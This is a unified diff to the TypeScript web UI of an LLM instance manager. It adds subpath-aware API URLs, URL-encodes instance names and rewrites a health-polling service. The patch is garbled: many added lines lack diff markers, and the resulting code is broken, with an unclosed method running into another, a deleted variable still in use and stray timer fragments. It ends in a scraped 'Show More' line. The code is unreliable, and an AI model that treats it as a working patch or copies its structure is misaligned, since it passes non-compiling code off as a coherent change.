@@ -53,7 +57,9 @@ describe('API Error Handling', () => {
    await instancesApi.getLogs('test-instance', 100)
    expect(mockFetch).toHaveBeenCalledWith(
-      '/api/v1/instances/test-instance/logs?lines=100',
+      expect.stringMatching(
        /^https?:\/\/[^/]+\/api\/v1\/instances\/test-instance\/logs\?lines=100$/
      ),
      expect.any(Object)
    )
  })
--- a/webui/src/lib/api.ts
+++ b/webui/src/lib/api.ts
@@ -1,7 +1,10 @@
 import type { CreateInstanceOptions, Instance } from "@/types/instance";
 import { handleApiError } from "./errorUtils";
-const API_BASE = "/api/v1";
+// Adding baseURI as a prefix to support being served behind a subpath
 // e.g. when llmamctl's `/` is served behind a reverse proxy at `/proxy/...`
 // the baseURI will be `/proxy/` and the API calls will be made to `/proxy/api/v1/<endpoint>`
 export const API_BASE = document.baseURI + "api/v1";
 // Base API call function with error handling
 async function apiCall<T>(
@@ -46,11 +49,8 @@ async function apiCall<T>(
    } else {
      // Handle empty responses for JSON endpoints
      const contentLength = response.headers.get('content-length');
-      if (contentLength === '0' || contentLength === null) {
+      if (contentLength === '0') {
-        const text = await response.text();
+        return {} as T; // Return empty object for empty JSON responses
        if (text.trim() === '') {
          return {} as T; // Return empty object for empty JSON responses
        }
      }
      const data = await response.json() as T;
      return data;
@@ -103,58 +103,74 @@ export const backendsApi = {
  },
 };
 // Node API types
 export interface NodeResponse {
  address: string;
 }
 export type NodesMap = Record<string, NodeResponse>;
 // Node API functions
 export const nodesApi = {
  // GET /nodes - returns map of node name to NodeResponse
  list: () => apiCall<NodesMap>("/nodes"),
  // GET /nodes/{name}
  get: (name: string) => apiCall<NodeResponse>(`/nodes/${encodeURIComponent(name)}`),
 };
 // Instance API functions
 export const instancesApi = {
  // GET /instances
  list: () => apiCall<Instance[]>("/instances"),
  // GET /instances/{name}
-  get: (name: string) => apiCall<Instance>(`/instances/${name}`),
+  get: (name: string) => apiCall<Instance>(`/instances/${encodeURIComponent(name)}`),
  // POST /instances/{name}
  create: (name: string, options: CreateInstanceOptions) =>
-    apiCall<Instance>(`/instances/${name}`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
      method: "POST",
      body: JSON.stringify(options),
    }),
  // PUT /instances/{name}
  update: (name: string, options: CreateInstanceOptions) =>
-    apiCall<Instance>(`/instances/${name}`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
      method: "PUT",
      body: JSON.stringify(options),
    }),
  // DELETE /instances/{name}
  delete: (name: string) =>
-    apiCall<void>(`/instances/${name}`, {
+    apiCall<void>(`/instances/${encodeURIComponent(name)}`, {
      method: "DELETE",
    }),
  // POST /instances/{name}/start
  start: (name: string) =>
-    apiCall<Instance>(`/instances/${name}/start`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}/start`, {
      method: "POST",
    }),
  // POST /instances/{name}/stop
  stop: (name: string) =>
-    apiCall<Instance>(`/instances/${name}/stop`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}/stop`, {
      method: "POST",
    }),
  // POST /instances/{name}/restart
  restart: (name: string) =>
-    apiCall<Instance>(`/instances/${name}/restart`, {
+    apiCall<Instance>(`/instances/${encodeURIComponent(name)}/restart`, {
      method: "POST",
    }),
  // GET /instances/{name}/logs
  getLogs: (name: string, lines?: number) => {
    const params = lines ? `?lines=${lines}` : "";
-    return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
+    return apiCall<string>(`/instances/${encodeURIComponent(name)}/logs${params}`, {}, "text");
  },
  // GET /instances/{name}/proxy/health
-  getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
+  getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${encodeURIComponent(name)}/proxy/health`),
 };
--- a/webui/src/lib/errorUtils.ts
+++ b/webui/src/lib/errorUtils.ts
@@ -26,7 +26,8 @@ export async function handleApiError(response: Response): Promise<void> {
  }
  if (!response.ok) {
-    const errorMessage = await parseErrorResponse(response)
+    // Clone the response before reading to avoid consuming the body stream
    const errorMessage = await parseErrorResponse(response.clone())
    throw new Error(errorMessage)
  }
 }
--- a/webui/src/lib/healthService.ts
+++ b/webui/src/lib/healthService.ts
@@ -1,51 +1,159 @@
-import { type HealthStatus } from '@/types/instance'
+import { type HealthStatus, type InstanceStatus, type HealthState } from '@/types/instance'
 import { instancesApi } from '@/lib/api'
 type HealthCallback = (health: HealthStatus) => void
 // Polling intervals based on health state (in milliseconds)
 const POLLING_INTERVALS: Record<HealthState, number> = {
  'starting': 5000,    // 5 seconds - frequent during startup
  'restarting': 5000,  // 5 seconds - restart in progress
  'ready': 60000,      // 60 seconds - stable state
  'stopped': 0,        // No polling
  'failed': 0,         // No polling
 }
 class HealthService {
  private intervals: Map<string, NodeJS.Timeout> = new Map()
  private callbacks: Map<string, Set<HealthCallback>> = new Map()
  private lastHealthState: Map<string, HealthState> = new Map()
  private healthCache: Map<string, { health: HealthStatus; timestamp: number }> = new Map()
  private readonly CACHE_TTL = 2000 // 2 seconds cache
  /**
   * Performs a two-tier health check:
   * 1. Get instance status from backend (authoritative)
   * 2. If running, perform HTTP health check
   */
  async performHealthCheck(instanceName: string): Promise<HealthStatus> {
    // Check cache first
    const cached = this.healthCache.get(instanceName)
    if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
      return cached.health
    }
  async checkHealth(instanceName: string): Promise<HealthStatus> {
    try {
-      await instancesApi.getHealth(instanceName)
+      // Step 1: Get instance details (includes status)
-      
+      const instance = await instancesApi.get(instanceName)
-      return {
+
-        status: 'ok',
+      // Step 2: If running, attempt HTTP health check
-        lastChecked: new Date()
+      if (instance.status === 'running') {
-      }
+        try {
-    } catch (error) {
+          await instancesApi.getHealth(instanceName)
-      if (error instanceof Error) {
+
-        // Check if it's a 503 (service unavailable - loading)
+          // HTTP health check succeeded - instance is ready
-        if (error.message.includes('503')) {
+          const health: HealthStatus = {
-          return {
+            state: 'ready',
-            status: 'loading',
+            instanceStatus: 'running',
-            message: 'Instance is starting up',
+            lastChecked: new Date(),
-            lastChecked: new Date()
+            source: 'http'
          }
          this.updateCache(instanceName, health)
          return health
        } catch (httpError) {
          // HTTP health check failed - instance is still starting
          // Any error (503, connection refused, timeout, etc.) means "starting"
          const health: HealthStatus = {
            state: 'starting',
            instanceStatus: 'running',
            lastChecked: new Date(),
            error: httpError instanceof Error ? httpError.message : 'Health check failed',
            source: 'http'
          }
          this.updateCache(instanceName, health)
          return health
        }
-        
+      } else {
-        return {
+        // Instance not running - map backend status directly
-          status: 'error',
+        const health: HealthStatus = {
-          message: error.message,
+          state: this.mapStatusToHealthState(instance.status),
-          lastChecked: new Date()
+          instanceStatus: instance.status,
          lastChecked: new Date(),
          source: 'backend'
        }
        this.updateCache(instanceName, health)
        return health
      }
-      
+
-      return {
+    } catch (error) {
-        status: 'error',
+      // Failed to get instance status from backend
-        message: 'Unknown error',
+      // This is a backend communication error, not an instance health error
-        lastChecked: new Date()
+      // Let the error propagate so polling can retry
-      }
+      console.error(`Failed to get instance status for ${instanceName}:`, error)
      throw error
    }
  }
  /**
   * Maps backend instance status to health state
   */
  private mapStatusToHealthState(status: InstanceStatus): HealthState {
    switch (status) {
      case 'stopped': return 'stopped'
      case 'running': return 'starting' // Should not happen as we check HTTP for running
      case 'failed': return 'failed'
      case 'restarting': return 'restarting'
    }
  }
  /**
   * Updates health cache
   */
  private updateCache(instanceName: string, health: HealthStatus): void {
    this.healthCache.set(instanceName, {
      health,
      timestamp: Date.now()
    })
  }
  /**
   * Manually refresh health for an instance
   */
  async refreshHealth(instanceName: string): Promise<void> {
    // Invalidate cache
    this.healthCache.delete(instanceName)
    try {
      const health = await this.performHealthCheck(instanceName)
      this.notifyCallbacks(instanceName, health)
      // Update last state and adjust polling interval if needed
      const previousState = this.lastHealthState.get(instanceName)
      this.lastHealthState.set(instanceName, health.state)
      if (previousState !== health.state) {
        this.adjustPollingInterval(instanceName, health.state)
      }
    } catch (error) {
      // Error getting health - keep polling if active
      console.error(`Failed to refresh health for ${instanceName}:`, error)
    }
  }
  /**
   * Trigger health check after instance operation
   */
  checkHealthAfterOperation(instanceName: string, operation: 'start' | 'stop' | 'restart'): void {
    // Invalidate cache immediately
    this.healthCache.delete(instanceName)
    // Perform immediate health check
    this.refreshHealth(instanceName).catch(error => {
      console.error(`Failed to check health after ${operation}:`, error)
    })
  }
  /**
   * Subscribe to health updates for an instance
   */
  subscribe(instanceName: string, callback: HealthCallback): () => void {
    if (!this.callbacks.has(instanceName)) {
      this.callbacks.set(instanceName, new Set())
    }
-    
+
    this.callbacks.get(instanceName)!.add(callback)
    // Start health checking if this is the first subscriber
@@ -58,36 +166,76 @@ class HealthService {
      const callbacks = this.callbacks.get(instanceName)
      if (callbacks) {
        callbacks.delete(callback)
-        
+
        // Stop health checking if no more subscribers
        if (callbacks.size === 0) {
          this.stopHealthCheck(instanceName)
          this.callbacks.delete(instanceName)
          this.lastHealthState.delete(instanceName)
          this.healthCache.delete(instanceName)
        }
      }
    }
  }
  /**
   * Start health checking for an instance
   */
  private startHealthCheck(instanceName: string): void {
    if (this.intervals.has(instanceName)) {
      return // Already checking
    }
-    // Initial check with delay
+    // Initial check immediately
-    setTimeout(async () => {
+    this.refreshHealth(instanceName).then(() => {
-      const health = await this.checkHealth(instanceName)
+      const currentState = this.lastHealthState.get(instanceName)
-      this.notifyCallbacks(instanceName, health)
+      if (currentState) {
-      
+        this.adjustPollingInterval(instanceName, currentState)
-      // Start periodic checks
+      }
-      const interval = setInterval(async () => {
+    }).catch(error => {
-        const health = await this.checkHealth(instanceName)
+      console.error(`Failed to start health check for ${instanceName}:`, error)
-        this.notifyCallbacks(instanceName, health)
+    })
      }, 60000)
      this.intervals.set(instanceName, interval)
    }, 5000)
  }
  /**
   * Adjust polling interval based on current health state
   */
  private adjustPollingInterval(instanceName: string, state: HealthState): void {
    // Clear existing interval
    this.stopHealthCheck(instanceName)
    const pollInterval = POLLING_INTERVALS[state]
    // Don't poll for stable states (stopped, failed)
    if (pollInterval === 0) {
      return
    }
    // Start new interval with appropriate timing
    const interval = setInterval(async () => {
      try {
        const health = await this.performHealthCheck(instanceName)
        this.notifyCallbacks(instanceName, health)
        // Check if state changed and adjust interval
        const previousState = this.lastHealthState.get(instanceName)
        this.lastHealthState.set(instanceName, health.state)
        if (previousState !== health.state) {
          this.adjustPollingInterval(instanceName, health.state)
        }
      } catch (error) {
        console.error(`Health check failed for ${instanceName}:`, error)
        // Continue polling even on error
      }
    }, pollInterval)
    this.intervals.set(instanceName, interval)
  }
  /**
   * Stop health checking for an instance
   */
  private stopHealthCheck(instanceName: string): void {
    const interval = this.intervals.get(instanceName)
    if (interval) {
@@ -96,6 +244,9 @@ class HealthService {
    }
  }
  /**
   * Notify all callbacks with health update
   */
  private notifyCallbacks(instanceName: string, health: HealthStatus): void {
    const callbacks = this.callbacks.get(instanceName)
    if (callbacks) {
@@ -103,16 +254,21 @@ class HealthService {
    }
  }
-  stopAll(): void {
+  /**
   * Stop all health checking and cleanup
   */
  destroy(): void {
    this.intervals.forEach(interval => clearInterval(interval))
    this.intervals.clear()
    this.callbacks.clear()
    this.lastHealthState.clear()
    this.healthCache.clear()
  }
 }
 export const healthService = new HealthService()
-// Export the individual checkHealth function as well
+// Export the individual performHealthCheck function as well
 export async function checkHealth(instanceName: string): Promise<HealthStatus> {
-  return healthService.checkHealth(instanceName)
+  return healthService.performHealthCheck(instanceName)
-}
+}
--- a/webui/src/lib/zodFormUtils.ts
+++ b/webui/src/lib/zodFormUtils.ts
@@ -1,12 +1,10 @@
 import {
  type CreateInstanceOptions,
  type LlamaCppBackendOptions,
  type MlxBackendOptions,
  type VllmBackendOptions,
  LlamaCppBackendOptionsSchema,
  MlxBackendOptionsSchema,
  VllmBackendOptionsSchema,
  getAllFieldKeys,
  getAllLlamaCppFieldKeys,
  getAllMlxFieldKeys,
  getAllVllmFieldKeys,
@@ -15,41 +13,6 @@ import {
  getVllmFieldType
 } from '@/schemas/instanceOptions'
 // Instance-level basic fields (not backend-specific)
 export const basicFieldsConfig: Record<string, {
  label: string
  description?: string
  placeholder?: string
 }> = {
  auto_restart: {
    label: 'Auto Restart',
    description: 'Automatically restart the instance on failure'
  },
  max_restarts: {
    label: 'Max Restarts',
    placeholder: '3',
    description: 'Maximum number of restart attempts (0 = unlimited)'
  },
  restart_delay: {
    label: 'Restart Delay (seconds)',
    placeholder: '5',
    description: 'Delay in seconds before attempting restart'
  },
  idle_timeout: {
    label: 'Idle Timeout (minutes)',
    placeholder: '60',
    description: 'Time in minutes before instance is considered idle and stopped'
  },
  on_demand_start: {
    label: 'On-Demand Start',
    description: 'Start instance upon receiving OpenAI-compatible API request'
  },
  backend_type: {
    label: 'Backend Type',
    description: 'Type of backend to use for this instance'
  }
 }
 // LlamaCpp backend-specific basic fields
 const basicLlamaCppFieldsConfig: Record<string, {
  label: string
@@ -152,18 +115,6 @@ const backendFieldGetters = {
  llama_cpp: getAllLlamaCppFieldKeys,
 } as const
 function isBasicField(key: keyof CreateInstanceOptions): boolean {
  return key in basicFieldsConfig
 }
 export function getBasicFields(): (keyof CreateInstanceOptions)[] {
  return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
 }
 export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
  return getAllFieldKeys().filter(key => !isBasicField(key))
 }
 export function getBasicBackendFields(backendType?: string): string[] {
  const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldConfigs
  const config = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
@@ -222,5 +173,3 @@ export function getBackendFieldType(key: string): 'text' | 'number' | 'boolean'
  return 'text'
 }
 // Re-export the Zod-based functions
 export { getFieldType } from '@/schemas/instanceOptions'
--- a/Show More
+++ b/Show More